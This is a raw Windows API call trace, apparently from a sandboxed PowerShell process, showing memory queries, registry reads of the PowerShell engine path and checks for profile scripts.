[0081.259] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.259] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.260] CoTaskMemFree (pv=0x229ec0)
[0081.311] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.313] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.313] CoTaskMemFree (pv=0x229ec0)
[0081.313] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.314] CoTaskMemFree (pv=0x229ec0)
[0081.314] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.314] CoTaskMemFree (pv=0x229ec0)
[0081.315] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.315] CoTaskMemFree (pv=0x229ec0)
[0081.315] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.315] CoTaskMemFree (pv=0x229ec0)
[0081.315] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.315] CoTaskMemFree (pv=0x229ec0)
[0081.328] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.328] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.450] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.465] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.465] CoTaskMemFree (pv=0x229ec0)
[0081.739] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x229fd0
[0081.751] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x22a0e0
[0081.958] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.029] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.067] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.068] VirtualQuery (in: lpAddress=0x109ee0, lpBuffer=0x10ada0, dwLength=0x30 | out: lpBuffer=0x10ada0*(BaseAddress=0x109000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.143] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.144] VirtualQuery (in: lpAddress=0x10b490, lpBuffer=0x10c350, dwLength=0x30 | out: lpBuffer=0x10c350*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.145] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.145] CoTaskMemFree (pv=0x22a1f0)
[0082.159] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.159] CoTaskMemFree (pv=0x22a1f0)
[0082.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] VirtualQuery (in: lpAddress=0x10b740, lpBuffer=0x10c600, dwLength=0x30 | out: lpBuffer=0x10c600*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.189] VirtualQuery (in: lpAddress=0x10b740, lpBuffer=0x10c600, dwLength=0x30 | out: lpBuffer=0x10c600*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.189] VirtualQuery (in: lpAddress=0x10af90, lpBuffer=0x10be50, dwLength=0x30 | out: lpBuffer=0x10be50*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.189] VirtualQuery (in: lpAddress=0x10af90, lpBuffer=0x10be50, dwLength=0x30 | out: lpBuffer=0x10be50*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d598 | out: phkResult=0x10d598*=0x3a8) returned 0x0
[0082.190] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d51c, lpData=0x0, lpcbData=0x10d518*=0x0 | out: lpType=0x10d51c*=0x1, lpData=0x0, lpcbData=0x10d518*=0x56) returned 0x0
[0082.190] CoTaskMemAlloc (cb=0x5a) returned 0x19cb50
[0082.190] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d4ec, lpData=0x19cb50, lpcbData=0x10d4e8*=0x56 | out: lpType=0x10d4ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d4e8*=0x56) returned 0x0
[0082.190] CoTaskMemFree (pv=0x19cb50)
[0082.190] RegCloseKey (hKey=0x3a8) returned 0x0
[0082.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d598 | out: phkResult=0x10d598*=0x3a8) returned 0x0
[0082.190] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d51c, lpData=0x0, lpcbData=0x10d518*=0x0 | out: lpType=0x10d51c*=0x1, lpData=0x0, lpcbData=0x10d518*=0x56) returned 0x0
[0082.190] CoTaskMemAlloc (cb=0x5a) returned 0x19cb50
[0082.190] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d4ec, lpData=0x19cb50, lpcbData=0x10d4e8*=0x56 | out: lpType=0x10d4ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d4e8*=0x56) returned 0x0
[0082.190] CoTaskMemFree (pv=0x19cb50)
[0082.190] RegCloseKey (hKey=0x3a8) returned 0x0
[0082.191] CoTaskMemAlloc (cb=0x20c) returned 0x23ff40
[0082.191] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x23ff40 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.191] CoTaskMemFree (pv=0x23ff40)
[0082.191] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x10d150, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.191] CoTaskMemAlloc (cb=0x20c) returned 0x23ff40
[0082.191] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x23ff40 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.191] CoTaskMemFree (pv=0x23ff40)
[0082.191] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x10d150, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
[0082.191] SetErrorMode (uMode=0x1) returned 0x1
[0082.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d500 | out: lpFileInformation=0x10d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.191] SetErrorMode (uMode=0x1) returned 0x1
[0082.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d500 | out: lpFileInformation=0x10d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d500 | out: lpFileInformation=0x10d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10d500 | out: lpFileInformation=0x10d500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.192] SetErrorMode (uMode=0x1) returned 0x1
[0082.192] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.192] CoTaskMemFree (pv=0x22a1f0)
[0082.193] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.193] CoTaskMemFree (pv=0x22a1f0)
[0082.193] CoTaskMemAlloc (cb=0x104) returned 0x22a1f0
[0082.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22a1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.193] CoTaskMemFree (pv=0x22a1f0)
